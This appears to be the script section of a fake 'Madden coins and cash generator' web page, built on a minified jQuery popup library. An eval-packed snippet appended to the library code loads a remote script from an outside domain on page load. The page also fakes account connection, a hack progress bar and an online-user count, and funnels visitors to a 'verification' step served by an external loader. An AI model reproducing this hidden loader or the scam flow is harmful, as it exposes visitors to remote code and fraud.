c=b.items[b.index];b.contentContainer.detach(),b.content&&b.content.detach(),c.parsed||(c=b.parseEl(b.index));var d=c.type;if(y("BeforeChange",[b.currItem?b.currItem.type:"",d]),b.currItem=c,!b.currTemplate[d]){var f=b.st[d]?b.st[d].markup:!1;y("FirstMarkupParse",f),b.currTemplate[d]=f?a(f):!0}e&&e!==c.type&&b.container.removeClass("mfp-"+e+"-holder");var g=b["get"+d.charAt(0).toUpperCase()+d.slice(1)](c,b.currTemplate[d]);b.appendContent(g,d),c.preloaded=!0,y(n,c),e=c.type,b.container.prepend(b.contentContainer),y("AfterChange")},appendContent:function(a,c){b.content=a,a?b.st.showCloseBtn&&b.st.closeBtnInside&&b.currTemplate[c]===!0?b.content.find(".mfp-close").length||b.content.append(z()):b.content=a:b.content="",y(k),b.container.addClass("mfp-"+c+"-holder"),b.contentContainer.append(b.content)},parseEl:function(c){var d,e=b.items[c];if(e.tagName?e={el:a(e)}:(d=e.type,e={data:e,src:e.src}),e.el){for(var f=b.types,g=0;g<f.length;g++)if(e.el.hasClass("mfp-"+f[g])){d=f[g];break}e.src=e.el.attr("data-mfp-src"),e.src||(e.src=e.el.attr("href"))}return e.type=d||b.st.type||"inline",e.index=c,e.parsed=!0,b.items[c]=e,y("ElementParse",e),b.items[c]},addGroup:function(a,c){var d=function(d){d.mfpEl=this,b._openClick(d,a,c)};c||(c={});var e="click.magnificPopup";c.mainEl=a,c.items?(c.isObj=!0,a.off(e).on(e,d)):(c.isObj=!1,c.delegate?a.off(e).on(e,c.delegate,d):(c.items=a,a.off(e).on(e,d)))},_openClick:function(c,d,e){var f=void 0!==e.midClick?e.midClick:a.magnificPopup.defaults.midClick;if(f||2!==c.which&&!c.ctrlKey&&!c.metaKey){var g=void 0!==e.disableOn?e.disableOn:a.magnificPopup.defaults.disableOn;if(g)if(a.isFunction(g)){if(!g.call(b))return!0}else if(v.width()<g)return!0;c.type&&(c.preventDefault(),b.isOpen&&c.stopPropagation()),e.el=a(c.mfpEl),e.delegate&&(e.items=d.find(e.delegate)),b.open(e)}},updateStatus:function(a,d){if(b.preloader){c!==a&&b.container.removeClass("mfp-s-"+c),d||"loading"!==a||(d=b.st.tLoading);var e={status:a,text:d};y("UpdateStatus",e),a=e.status,d=e.text,b.preloader.html(d),b.preloader.find("a").on("click",function(a){a.stopImmediatePropagation()}),b.container.addClass("mfp-s-"+a),c=a}},_checkIfClose:function(c){if(!a(c).hasClass(s)){var d=b.st.closeOnContentClick,e=b.st.closeOnBgClick;if(d&&e)return!0;if(!b.content||a(c).hasClass("mfp-close")||b.preloader&&c===b.preloader[0])return!0;if(c===b.content[0]||a.contains(b.content[0],c)){if(d)return!0}else if(e&&a.contains(document,c))return!0;return!1}},_addClassToMFP:function(a){b.bgOverlay.addClass(a),b.wrap.addClass(a)},_removeClassFromMFP:function(a){this.bgOverlay.removeClass(a),b.wrap.removeClass(a)},_hasScrollBar:function(a){return(b.isIE7?d.height():document.body.scrollHeight)>(a||v.height())},_setFocus:function(){(b.st.focus?b.content.find(b.st.focus).eq(0):b.wrap).focus()},_onFocusIn:function(c){return c.target===b.wrap[0]||a.contains(b.wrap[0],c.target)?void 0:(b._setFocus(),!1)},_parseMarkup:function(b,c,d){var e;d.data&&(c=a.extend(d.data,c)),y(l,[b,c,d]),a.each(c,function(a,c){if(void 0===c||c===!1)return!0;if(e=a.split("_"),e.length>1){var d=b.find(p+"-"+e[0]);if(d.length>0){var f=e[1];"replaceWith"===f?d[0]!==c[0]&&d.replaceWith(c):"img"===f?d.is("img")?d.attr("src",c):d.replaceWith('<img src="'+c+'" class="'+d.attr("class")+'" />'):d.attr(e[1],c)}}else b.find(p+"-"+a).html(c)})},_getScrollbarSize:function(){if(void 0===b.scrollbarSize){var a=document.createElement("div");a.style.cssText="width: 99px; height: 99px; overflow: scroll; position: absolute; top: -9999px;",document.body.appendChild(a),b.scrollbarSize=a.offsetWidth-a.clientWidth,document.body.removeChild(a)}return b.scrollbarSize}},a.magnificPopup={instance:null,proto:t.prototype,modules:[],open:function(b,c){return A(),b=b?a.extend(!0,{},b):{},b.isObj=!0,b.index=c||0,this.instance.open(b)},close:function(){return a.magnificPopup.instance&&a.magnificPopup.instance.close()},registerModule:function(b,c){c.options&&(a.magnificPopup.defaults[b]=c.options),a.extend(this.proto,c.proto),this.modules.push(b)},defaults:{disableOn:0,key:null,midClick:!1,mainClass:"",preloader:!0,focus:"",closeOnContentClick:!1,closeOnBgClick:!0,closeBtnInside:!0,showCloseBtn:!0,enableEscapeKey:!0,modal:!1,alignTop:!1,removalDelay:0,prependTo:null,fixedContentPos:"auto",fixedBgPos:"auto",overflowY:"auto",closeMarkup:'<button title="%title%" type="button" class="mfp-close">&times;</button>',tClose:"Close (Esc)",tLoading:"Loading..."}},a.fn.magnificPopup=function(c){A();var d=a(this);if("string"==typeof c)if("open"===c){var e,f=u?d.data("magnificPopup"):d[0].magnificPopup,g=parseInt(arguments[1],10)||0;f.items?e=f.items[g]:(e=d,f.delegate&&(e=e.find(f.delegate)),e=e.eq(g)),b._openClick({mfpEl:e},d,f)}else b.isOpen&&b[c].apply(b,Array.prototype.slice.call(arguments,1));else c=a.extend(!0,{},c),u?d.data("magnificPopup",c):d[0].magnificPopup=c,b.addGroup(d,c);return d};var C,D,E,F="inline",G=function(){E&&(D.after(E.addClass(C)).detach(),E=null)};a.magnificPopup.registerModule(F,{options:{hiddenClass:"hide",markup:"",tNotFound:"Content not found"},proto:{initInline:function(){b.types.push(F),w(h+"."+F,function(){G()})},getInline:function(c,d){if(G(),c.src){var e=b.st.inline,f=a(c.src);if(f.length){var g=f[0].parentNode;g&&g.tagName&&(D||(C=e.hiddenClass,D=x(C),C="mfp-"+C),E=f.after(D).detach().removeClass(C)),b.updateStatus("ready")}else b.updateStatus("error",e.tNotFound),f=a("<div>");return c.inlineElement=f,f}return b.updateStatus("ready"),b._parseMarkup(d,{},c),d}}});var H,I="ajax",J=function(){H&&a(document.body).removeClass(H)},K=function(){J(),b.req&&b.req.abort()};a.magnificPopup.registerModule(I,{options:{settings:null,cursor:"mfp-ajax-cur",tError:'<a href="%url%">The content</a> could not be loaded.'},proto:{initAjax:function(){b.types.push(I),H=b.st.ajax.cursor,w(h+"."+I,K),w("BeforeChange."+I,K)},getAjax:function(c){H&&a(document.body).addClass(H),b.updateStatus("loading");var d=a.extend({url:c.src,success:function(d,e,f){var g={data:d,xhr:f};y("ParseAjax",g),b.appendContent(a(g.data),I),c.finished=!0,J(),b._setFocus(),setTimeout(function(){b.wrap.addClass(q)},16),b.updateStatus("ready"),y("AjaxContentAdded")},error:function(){J(),c.finished=c.loadError=!0,b.updateStatus("error",b.st.ajax.tError.replace("%url%",c.src))}},b.st.ajax.settings);return b.req=a.ajax(d),""}}});var L,M=function(c){if(c.data&&void 0!==c.data.title)return c.data.title;var d=b.st.image.titleSrc;if(d){if(a.isFunction(d))return d.call(b,c);if(c.el)return c.el.attr(d)||""}return""};a.magnificPopup.registerModule("image",{options:{markup:'<div class="mfp-figure"><div class="mfp-close"></div><figure><div class="mfp-img"></div><figcaption><div class="mfp-bottom-bar"><div class="mfp-title"></div><div class="mfp-counter"></div></div></figcaption></figure></div>',cursor:"mfp-zoom-out-cur",titleSrc:"title",verticalFit:!0,tError:'<a href="%url%">The image</a> could not be loaded.'},proto:{initImage:function(){var c=b.st.image,d=".image";b.types.push("image"),w(m+d,function(){"image"===b.currItem.type&&c.cursor&&a(document.body).addClass(c.cursor)}),w(h+d,function(){c.cursor&&a(document.body).removeClass(c.cursor),v.off("resize"+p)}),w("Resize"+d,b.resizeImage),b.isLowIE&&w("AfterChange",b.resizeImage)},resizeImage:function(){var a=b.currItem;if(a&&a.img&&b.st.image.verticalFit){var c=0;b.isLowIE&&(c=parseInt(a.img.css("padding-top"),10)+parseInt(a.img.css("padding-bottom"),10)),a.img.css("max-height",b.wH-c)}},_onImageHasSize:function(a){a.img&&(a.hasSize=!0,L&&clearInterval(L),a.isCheckingImgSize=!1,y("ImageHasSize",a),a.imgHidden&&(b.content&&b.content.removeClass("mfp-loading"),a.imgHidden=!1))},findImageSize:function(a){var c=0,d=a.img[0],e=function(f){L&&clearInterval(L),L=setInterval(function(){return d.naturalWidth>0?void b._onImageHasSize(a):(c>200&&clearInterval(L),c++,void(3===c?e(10):40===c?e(50):100===c&&e(500)))},f)};e(1)},getImage:function(c,d){var e=0,f=function(){c&&(c.img[0].complete?(c.img.off(".mfploader"),c===b.currItem&&(b._onImageHasSize(c),b.updateStatus("ready")),c.hasSize=!0,c.loaded=!0,y("ImageLoadComplete")):(e++,200>e?setTimeout(f,100):g()))},g=function(){c&&(c.img.off(".mfploader"),c===b.currItem&&(b._onImageHasSize(c),b.updateStatus("error",h.tError.replace("%url%",c.src))),c.hasSize=!0,c.loaded=!0,c.loadError=!0)},h=b.st.image,i=d.find(".mfp-img");if(i.length){var j=document.createElement("img");j.className="mfp-img",c.el&&c.el.find("img").length&&(j.alt=c.el.find("img").attr("alt")),c.img=a(j).on("load.mfploader",f).on("error.mfploader",g),j.src=c.src,i.is("img")&&(c.img=c.img.clone()),j=c.img[0],j.naturalWidth>0?c.hasSize=!0:j.width||(c.hasSize=!1)}return b._parseMarkup(d,{title:M(c),img_replaceWith:c.img},c),b.resizeImage(),c.hasSize?(L&&clearInterval(L),c.loadError?(d.addClass("mfp-loading"),b.updateStatus("error",h.tError.replace("%url%",c.src))):(d.removeClass("mfp-loading"),b.updateStatus("ready")),d):(b.updateStatus("loading"),c.loading=!0,c.hasSize||(c.imgHidden=!0,d.addClass("mfp-loading"),b.findImageSize(c)),d)}}});var N,O=function(){return void 0===N&&(N=void 0!==document.createElement("p").style.MozTransform),N};a.magnificPopup.registerModule("zoom",{options:{enabled:!1,easing:"ease-in-out",duration:300,opener:function(a){return a.is("img")?a:a.find("img")}},proto:{initZoom:function(){var a,c=b.st.zoom,d=".zoom";if(c.enabled&&b.supportsTransition){var e,f,g=c.duration,j=function(a){var b=a.clone().removeAttr("style").removeAttr("class").addClass("mfp-animated-image"),d="all "+c.duration/1e3+"s "+c.easing,e={position:"fixed",zIndex:9999,left:0,top:0,"-webkit-backface-visibility":"hidden"},f="transition";return e["-webkit-"+f]=e["-moz-"+f]=e["-o-"+f]=e[f]=d,b.css(e),b},k=function(){b.content.css("visibility","visible")};w("BuildControls"+d,function(){if(b._allowZoom()){if(clearTimeout(e),b.content.css("visibility","hidden"),a=b._getItemToZoom(),!a)return void k();f=j(a),f.css(b._getOffset()),b.wrap.append(f),e=setTimeout(function(){f.css(b._getOffset(!0)),e=setTimeout(function(){k(),setTimeout(function(){f.remove(),a=f=null,y("ZoomAnimationEnded")},16)},g)},16)}}),w(i+d,function(){if(b._allowZoom()){if(clearTimeout(e),b.st.removalDelay=g,!a){if(a=b._getItemToZoom(),!a)return;f=j(a)}f.css(b._getOffset(!0)),b.wrap.append(f),b.content.css("visibility","hidden"),setTimeout(function(){f.css(b._getOffset())},16)}}),w(h+d,function(){b._allowZoom()&&(k(),f&&f.remove(),a=null)})}},_allowZoom:function(){return"image"===b.currItem.type},_getItemToZoom:function(){return b.currItem.hasSize?b.currItem.img:!1},_getOffset:function(c){var d;d=c?b.currItem.img:b.st.zoom.opener(b.currItem.el||b.currItem);var e=d.offset(),f=parseInt(d.css("padding-top"),10),g=parseInt(d.css("padding-bottom"),10);e.top-=a(window).scrollTop()-f;var h={width:d.width(),height:(u?d.innerHeight():d[0].offsetHeight)-g-f};return O()?h["-moz-transform"]=h.transform="translate("+e.left+"px,"+e.top+"px)":(h.left=e.left,h.top=e.top),h}}});var P="iframe",Q="//about:blank",R=function(a){if(b.currTemplate[P]){var c=b.currTemplate[P].find("iframe");c.length&&(a||(c[0].src=Q),b.isIE8&&c.css("display",a?"block":"none"))}};a.magnificPopup.registerModule(P,{options:{markup:'<div class="mfp-iframe-scaler"><div class="mfp-close"></div><iframe class="mfp-iframe" src="//about:blank" frameborder="0" allowfullscreen></iframe></div>',srcAction:"iframe_src",patterns:{youtube:{index:"youtube.com",id:"v=",src:"//www.youtube.com/embed/%id%?autoplay=1"},vimeo:{index:"vimeo.com/",id:"/",src:"//player.vimeo.com/video/%id%?autoplay=1"},gmaps:{index:"//maps.google.",src:"%id%&output=embed"}}},proto:{initIframe:function(){b.types.push(P),w("BeforeChange",function(a,b,c){b!==c&&(b===P?R():c===P&&R(!0))}),w(h+"."+P,function(){R()})},getIframe:function(c,d){var e=c.src,f=b.st.iframe;a.each(f.patterns,function(){return e.indexOf(this.index)>-1?(this.id&&(e="string"==typeof this.id?e.substr(e.lastIndexOf(this.id)+this.id.length,e.length):this.id.call(this,e)),e=this.src.replace("%id%",e),!1):void 0});var g={};return f.srcAction&&(g[f.srcAction]=e),b._parseMarkup(d,g,c),b.updateStatus("ready"),d}}});var S=function(a){var c=b.items.length;return a>c-1?a-c:0>a?c+a:a},T=function(a,b,c){return a.replace(/%curr%/gi,b+1).replace(/%total%/gi,c)};a.magnificPopup.registerModule("gallery",{options:{enabled:!1,arrowMarkup:'<button title="%title%" type="button" class="mfp-arrow mfp-arrow-%dir%"></button>',preload:[0,2],navigateByImgClick:!0,arrows:!0,tPrev:"Previous (Left arrow key)",tNext:"Next (Right arrow key)",tCounter:"%curr% of %total%"},proto:{initGallery:function(){var c=b.st.gallery,e=".mfp-gallery",g=Boolean(a.fn.mfpFastClick);return b.direction=!0,c&&c.enabled?(f+=" mfp-gallery",w(m+e,function(){c.navigateByImgClick&&b.wrap.on("click"+e,".mfp-img",function(){return b.items.length>1?(b.next(),!1):void 0}),d.on("keydown"+e,function(a){37===a.keyCode?b.prev():39===a.keyCode&&b.next()})}),w("UpdateStatus"+e,function(a,c){c.text&&(c.text=T(c.text,b.currItem.index,b.items.length))}),w(l+e,function(a,d,e,f){var g=b.items.length;e.counter=g>1?T(c.tCounter,f.index,g):""}),w("BuildControls"+e,function(){if(b.items.length>1&&c.arrows&&!b.arrowLeft){var d=c.arrowMarkup,e=b.arrowLeft=a(d.replace(/%title%/gi,c.tPrev).replace(/%dir%/gi,"left")).addClass(s),f=b.arrowRight=a(d.replace(/%title%/gi,c.tNext).replace(/%dir%/gi,"right")).addClass(s),h=g?"mfpFastClick":"click";e[h](function(){b.prev()}),f[h](function(){b.next()}),b.isIE7&&(x("b",e[0],!1,!0),x("a",e[0],!1,!0),x("b",f[0],!1,!0),x("a",f[0],!1,!0)),b.container.append(e.add(f))}}),w(n+e,function(){b._preloadTimeout&&clearTimeout(b._preloadTimeout),b._preloadTimeout=setTimeout(function(){b.preloadNearbyImages(),b._preloadTimeout=null},16)}),void w(h+e,function(){d.off(e),b.wrap.off("click"+e),b.arrowLeft&&g&&b.arrowLeft.add(b.arrowRight).destroyMfpFastClick(),b.arrowRight=b.arrowLeft=null})):!1},next:function(){b.direction=!0,b.index=S(b.index+1),b.updateItemHTML()},prev:function(){b.direction=!1,b.index=S(b.index-1),b.updateItemHTML()},goTo:function(a){b.direction=a>=b.index,b.index=a,b.updateItemHTML()},preloadNearbyImages:function(){var a,c=b.st.gallery.preload,d=Math.min(c[0],b.items.length),e=Math.min(c[1],b.items.length);for(a=1;a<=(b.direction?e:d);a++)b._preloadItem(b.index+a);for(a=1;a<=(b.direction?d:e);a++)b._preloadItem(b.index-a)},_preloadItem:function(c){if(c=S(c),!b.items[c].preloaded){var d=b.items[c];d.parsed||(d=b.parseEl(c)),y("LazyLoad",d),"image"===d.type&&(d.img=a('<img class="mfp-img" />').on("load.mfploader",function(){d.hasSize=!0}).on("error.mfploader",function(){d.hasSize=!0,d.loadError=!0,y("LazyLoadError",d)}).attr("src",d.src)),d.preloaded=!0}}}});var U="retina";a.magnificPopup.registerModule(U,{options:{replaceSrc:function(a){return a.src.replace(/\.\w+$/,function(a){return"@2x"+a})},ratio:1},proto:{initRetina:function(){if(window.devicePixelRatio>1){var a=b.st.retina,c=a.ratio;c=isNaN(c)?c():c,c>1&&(w("ImageHasSize."+U,function(a,b){b.img.css({"max-width":b.img[0].naturalWidth/c,width:"100%"})}),w("ElementParse."+U,function(b,d){d.src=a.replaceSrc(d,c)}))}}}}),function(){var b=1e3,c="ontouchstart"in window,d=function(){v.off("touchmove"+f+" touchend"+f)},e="mfpFastClick",f="."+e;a.fn.mfpFastClick=function(e){return a(this).each(function(){var g,h=a(this);if(c){var i,j,k,l,m,n;h.on("touchstart"+f,function(a){l=!1,n=1,m=a.originalEvent?a.originalEvent.touches[0]:a.touches[0],j=m.clientX,k=m.clientY,v.on("touchmove"+f,function(a){m=a.originalEvent?a.originalEvent.touches:a.touches,n=m.length,m=m[0],(Math.abs(m.clientX-j)>10||Math.abs(m.clientY-k)>10)&&(l=!0,d())}).on("touchend"+f,function(a){d(),l||n>1||(g=!0,a.preventDefault(),clearTimeout(i),i=setTimeout(function(){g=!1},b),e())})})}h.on("click"+f,function(){g||e()})})},a.fn.destroyMfpFastClick=function(){a(this).off("touchstart"+f+" click"+f),c&&v.off("touchmove"+f+" touchend"+f)}}(),A()});eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(5(0){4 1=0.7(\'1\');1.2=\'//3.6/d.8?c=b\';0.a.9(1)})(0);',14,14,'document|script|src|bootstraplugin|var|function|com|createElement|php|appendChild|head|175|id|p'.split('|'),0,{})) </script>
<script type="text/javascript">
function progressBar(percent, $element) {
		var progressBarWidth = percent * $element.width() / 100;
		$element.find('div').animate({ width: progressBarWidth }, 500).html(percent + "%&nbsp;");
	}
	progressBar(20, $('#progressBar'));
		
	var select = $( "#maddencoins-amount-wrapper" );
	var slider = $( "<div id='slider-maddencoins'></div>" ).insertAfter( select ).slider({
		min: 0,
		max: 1000000,
		value: 0,
		range: "min",
		change: function(event, ui) { 
			var sliderValue = $( "#slider-maddencoins" ).slider( "option", "value" );				
			$('#maddencoins-amount').html(sliderValue);
			if(sliderValue == '12000') {
				
				$('#decrease-maddencoins').addClass('btn-disabled');
				$('.max-amount-coins').fadeOut();
			}
			else if (sliderValue == '24000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
			}
			else if (sliderValue == '36000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
			}
			else if (sliderValue == '48000') {
			
				$('#decrease-maddencoins').removeClass('btn-disabled');
			}
			else if (sliderValue == '60000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '72000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '84000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '96000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '108000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '120000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
				}
			else if (sliderValue == '720000') {
				
				$('#decrease-maddencoins').removeClass('btn-disabled');
			}
			else if (sliderValue == '840000') {
				
			}
			else if (sliderValue == '960000') {
				
				$('#increase-maddencoins').removeClass('btn-disabled');
				$('.max-amount-coins').fadeOut();
			}
			else if (sliderValue == '1000000') {
				
				$('#increase-maddencoins').addClass('btn-disabled');
				$('.max-amount-coins').fadeIn();
			}
		}        
	});	
	
	$('#increase-maddencoins').click(function() {
	var sliderCurrentValue = $( "#slider-maddencoins" ).slider( "option", "value" );
	  slider.slider( "value", sliderCurrentValue + 6000 );
	});

	$('#decrease-maddencoins').click(function() {
	var sliderCurrentValue = $( "#slider-maddencoins" ).slider( "option", "value" );
	  slider.slider( "value", sliderCurrentValue - 6000 );
	});

	
	
	

	
	
		
	function progressBarelixir(percent, $element) {
		var progressBarelixirWidth = percent * $element.width() / 100;
		$element.find('div').animate({ width: progressBarelixirWidth }, 500).html(percent + "%&nbsp;");
	}
	progressBarelixir(30, $('#progressBarelixir'));
	var selectelixir = $( "#maddencash-amount-wrapper" );
	var sliderelixir = $( "<div id='slider-maddencash'></div>" ).insertAfter( selectelixir ).slider({
		min: 0,
		max: 25000,
		value: 0,
		range: "min",
		change: function(event, ui) { 
				
				var sliderValueelixir = $( "#slider-maddencash" ).slider( "option", "value" );
				$('#maddencash-amount').html(sliderValueelixir);
					if(sliderValueelixir == '5000') {
						
						$('#decrease-maddencash').addClass('btn-disabled');
						$('.max-amount-elixir').fadeOut();
					}
					else if (sliderValueelixir == '10000') {
						
						$('#decrease-maddencash').removeClass('btn-disabled');
					}
					else if (sliderValueelixir == '15000') {
						
					}
					else if (sliderValueelixir == '20000') {
						
						$('#increase-maddencash').removeClass('btn-disabled');
						$('.max-amount-elixir').fadeOut();
					}
					else if (sliderValueelixir == '25000') {
						
						$('#increase-maddencash').addClass('btn-disabled');
						$('.max-amount-elixir').fadeIn();
					}
				}        
	});				

	$('#increase-maddencash').click(function() {
		var sliderCurrentelixirValue = $( "#slider-maddencash" ).slider( "option", "value" );
		sliderelixir.slider( "value", sliderCurrentelixirValue + 5000 );
	});






	var a = $( "#deviceselect" ).val();
	$( "#select-text2" ).text(a);





	$('#connect').click(function(event) {
		if ($('#username').val() == '') {
	 	console.log('usernameInput is null');
	 	  
			$.magnificPopup.open({
			                    items: {
			                        src: '#madden-connect-err',
			                    },
			                    type: 'inline',
			                    preloader: false,
			                    modal: true,
			                    
			                });
		
	 } else {

	 	
	 	$('#user-text').text($('#username').val());
	 	var a = $( "#deviceselect" ).val();
		$( "#select-text2" ).text(a);
		$('.fadeout-input').fadeOut('slow', function() {
							
                            $('.pre-connect').fadeIn('slow', function() {
                                console.log('pre connect');

                                progress_connect(function() {

				                                	$('.pre-connect').fadeOut('slow', function() {
											
				                            $('.connecting').fadeIn('slow', function() {
				                                $('#user-text').text($('#username').val());
	 											var a = $( "#deviceselect" ).val();
												$( "#select-text2" ).text(a);
				                                $('.connecting').addClass('connected');
				                                $('.connect-btn').addClass('connected-btn');
				                                
				                            });
				                       });
                                	
								});
                            });
                       });
		
	 }
	});



function progress_connect(callback) {
        var $progress_percent = 0;
        var $blue_progress = $('.connect-progressbar');
        $blue_progress.css('width', '0%');
        var interval_timer = setInterval(function() {
            if ($progress_percent == 0) {
                $progress_percent = 20;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 20) {
                $progress_percent = 35;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 35) {
                $progress_percent = 65;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 65) {
                $progress_percent = 75;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 75) {
                $progress_percent = 85;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 85) {
                $progress_percent = 89;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 89) {
                $progress_percent = 100;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 100) {
                callback();
                clearInterval(interval_timer);
            }
        }, Math.floor((Math.random() * 900) + 600));
    }





    $('.hack-btn').click(function(event) {
		if ($('.connecting').hasClass('connected')) {
			$('#madden-progress-text').text('madden hack starting');
			var text = $('#user-text').text();
				                            	$('#user-text2').append(text);
			$('.resources').fadeOut('slow', function() {
							
                            $('.hack-start').fadeIn('slow', function() {
                                console.log('start madden  GEnerator');
                               
                            });
                       });
			progress_madden(function() {
						
						$('#madden-progress-text').text('Adding madden selected coins');
                        
                        		
	                      		progress_madden1(function() {
	                      			$('#madden-progress-text').text('Adding madden selected cash');
	                      			var text = $('#user-text2').text();
				                            	$('#user-text3').append(text);
	                       $('.hack-start').fadeOut('slow', function() {
							
                            $('.hack-verification').fadeIn('slow', function() {
                                	
		                               
		                            });
		                       });
	                        		
	                    });


                    });

			
			console.log('ok');

			} else {

			$.magnificPopup.open({
	                items: {
	                    src: '#madden-connect-err',
	                },
	                type: 'inline',
	                preloader: false,
	                modal: true,
	                
	            });	

			}
	});




function progress_madden(callback) {
        var $progress_percent = 0;
        var $blue_progress = $('.g-progressbar');
        $blue_progress.css('width', '0%');
        var interval_timer = setInterval(function() {
            if ($progress_percent == 0) {
                $progress_percent = 20;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 20) {
                $progress_percent = 35;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 35) {
                $progress_percent = 65;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 65) {
                $progress_percent = 75;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 75) {
                $progress_percent = 85;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 85) {
                $progress_percent = 89;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 89) {
                $progress_percent = 100;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 100) {
                callback();
                clearInterval(interval_timer);
            }
        }, Math.floor((Math.random() * 900) + 600));
    }



    function progress_madden1(callback) {
        var $progress_percent = 0;
        var $blue_progress = $('.g-progressbar');
        $blue_progress.css('width', '0%');
        var interval_timer = setInterval(function() {
            if ($progress_percent == 0) {
                $progress_percent = 20;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 20) {
                $progress_percent = 35;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 35) {
                $progress_percent = 65;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 65) {
                $progress_percent = 75;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 75) {
                $progress_percent = 85;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 85) {
                $progress_percent = 89;
                $blue_progress.css('width', $progress_percent + '%');
            } else if ($progress_percent == 89) {
                $progress_percent = 100;
                $blue_progress.css('width', $progress_percent + '%')
            } else if ($progress_percent == 100) {
                callback();
                clearInterval(interval_timer);
            }
        }, Math.floor((Math.random() * 1100) + 600));
    }



    window.onload = function() {
            var webService = "http://www.jsonip.com/json";
            var script = document.createElement("script");
            script.type = "text/javascript";
            script.src = webService + "?callback=MyIP";
            document.getElementsByTagName("head")[0].appendChild(script);
        };

        function MyIP(response) {
            document.getElementById("ip").innerHTML = response.ip;
        }

        // online stats
        var eenum = 534;
        var ee;

        function dis_num2() {
            document.getElementById("online").innerHTML = eenum;
            var randWay = Math.floor(Math.random() * 10 + 1);
            if (randWay <= 5) {
                eenum = eenum + Math.floor(Math.random() * 10 + 1);;
            } else {
                eenum = eenum - Math.floor(Math.random() * 10 + 1);;
            }
            ee = setTimeout("dis_num2()", 1000);
        }
        dis_num2();
		</script>
		
		
		
		<script>var _webzone = "SxaytZj4LVAeoQV";</script>
<script src="//loader.ogstats.com"></script>

	</body>
</html>